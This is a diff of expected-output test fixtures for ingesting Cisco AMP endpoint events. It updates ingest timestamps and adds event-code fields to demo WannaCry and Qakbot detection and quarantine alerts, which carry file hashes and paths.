                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":28000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419229327140847656\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419229327140848000",
@@ -1456,8 +1473,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:13.513694411Z",
+                "ingested": "2021-09-30T00:15:28.103750142Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229322845880000,\"timestamp\":1610635263,\"timestamp_nanoseconds\":950000000,\"date\":\"2021-01-14T14:41:03+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419229322845880000",
@@ -1533,8 +1551,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:42:13.513696174Z",
+                "ingested": "2021-09-30T00:15:28.103752188Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":913000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411488666497056775\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}",
+                "code": "2164260893",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
                 "id": "6411488666497057000",
@@ -1608,8 +1627,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:42:13.513697923Z",
+                "ingested": "2021-09-30T00:15:28.103754226Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":913000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411488666497056774\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}",
+                "code": "2164260893",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
                 "id": "6411488666497057000",
@@ -1683,8 +1703,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:42:13.513699667Z",
+                "ingested": "2021-09-30T00:15:28.103756251Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":913000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411488666497056773\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}",
+                "code": "553648155",
                 "kind": "alert",
                 "action": "Retrospective Quarantine",
                 "id": "6411488666497057000",
@@ -1760,8 +1781,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:42:13.513701445Z",
+                "ingested": "2021-09-30T00:15:28.103758284Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":398000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.DD6D4FEDD3-100.SBX.TG\",\"detection_id\":\"6411488666497056775\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"qYf.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\qYf.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}",
+                "code": "553648147",
                 "kind": "alert",
                 "action": "Retrospective Detection",
                 "id": "6411488666497057000",
@@ -1839,8 +1861,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:42:13.513703177Z",
+                "ingested": "2021-09-30T00:15:28.103760323Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":398000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.DD6D4FEDD3-100.SBX.TG\",\"detection_id\":\"6411488666497056774\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"4191700.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\4191700.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}",
+                "code": "553648147",
                 "kind": "alert",
                 "action": "Retrospective Detection",
                 "id": "6411488666497057000",
@@ -1922,8 +1945,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:42:13.513705053Z",
+                "ingested": "2021-09-30T00:15:28.103762465Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":398000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.DD6D4FEDD3-100.SBX.TG\",\"detection_id\":\"6411488666497056773\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\",\"sha1\":\"8cf0ca99a8f5019d8583133b9a9379299c45470c\",\"md5\":\"6894b3834bd541fa85df79e44568acac\"}}}}",
+                "code": "553648147",
                 "kind": "alert",
                 "action": "Retrospective Detection",
                 "id": "6411488666497057000",
@@ -2002,8 +2026,9 @@
             },
             "event": {
                 "severity": 4,
-                "ingested": "2021-09-27T00:42:13.513706783Z",
+                "ingested": "2021-09-30T00:15:28.103764481Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1493058569636000800,\"timestamp\":1610633340,\"timestamp_nanoseconds\":636000000,\"date\":\"2021-01-14T14:09:00+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Critical\",\"start_timestamp\":1610633340,\"start_date\":\"2021-01-14T14:09:00+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.\",\"short_description\":\"W32.Qakbot.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/Windows/SysWOW64/cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c3eea0c27244f91cce86d57aca2b3f8d09f1dbd6274751226c6b09398a7ba4\"}}}}}",
+                "code": "1107296274",
                 "kind": "alert",
                 "start": "2021-01-14T14:09:00.000Z",
                 "action": "Cloud IOC",
@@ -2081,8 +2106,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:42:13.513708518Z",
+                "ingested": "2021-09-30T00:15:28.103766506Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264772016730014000,\"timestamp\":1610631960,\"timestamp_nanoseconds\":611000000,\"date\":\"2021-01-14T13:46:00+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6264772016730013699\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"}}}}",
+                "code": "553648155",
                 "kind": "alert",
                 "action": "Retrospective Quarantine",
                 "id": "6264772016730014000",
@@ -2162,8 +2188,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:42:13.513710300Z",
+                "ingested": "2021-09-30T00:15:28.103768528Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264772016730014000,\"timestamp\":1610631960,\"timestamp_nanoseconds\":65000000,\"date\":\"2021-01-14T13:46:00+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D5221F6847-100.SBX.TG\",\"detection_id\":\"6264772016730013699\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\rsteadman\\\\Downloads\\\\report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\",\"sha1\":\"5058b16a86beee96927371210b9a9f682976a50a\",\"md5\":\"48a0bf05b9706a00d2a0ff6260412f11\"}}}}",
+                "code": "553648147",
                 "kind": "alert",
                 "action": "Retrospective Detection",
                 "id": "6264772016730014000",
@@ -2241,8 +2268,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:42:13.513712010Z",
+                "ingested": "2021-09-30T00:15:28.103770531Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264772012435046000,\"timestamp\":1610631959,\"timestamp_nanoseconds\":940000000,\"date\":\"2021-01-14T13:45:59+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D5221F6847-100.SBX.TG\",\"detection_id\":\"6264772012435046402\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"Unconfirmed 762952.crdownload\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\rsteadman\\\\Downloads\\\\Unconfirmed 762952.crdownload\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"}}}}",
+                "code": "553648147",
                 "kind": "alert",
                 "action": "Retrospective Detection",
                 "id": "6264772012435046000",
@@ -2314,8 +2342,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:13.513713775Z",
+                "ingested": "2021-09-30T00:15:28.103772565Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":724000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419214500913741862\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419214500913742000",
@@ -2405,8 +2434,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:13.513715520Z",
+                "ingested": "2021-09-30T00:15:28.103774575Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":366000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419214500913741862\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419214500913742000",
@@ -2499,8 +2529,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:13.513717278Z",
+                "ingested": "2021-09-30T00:15:28.103776615Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":225000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419214500913741859\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":5580,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419214500913742000",
@@ -2588,8 +2619,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:13.513719023Z",
+                "ingested": "2021-09-30T00:15:28.103778634Z",
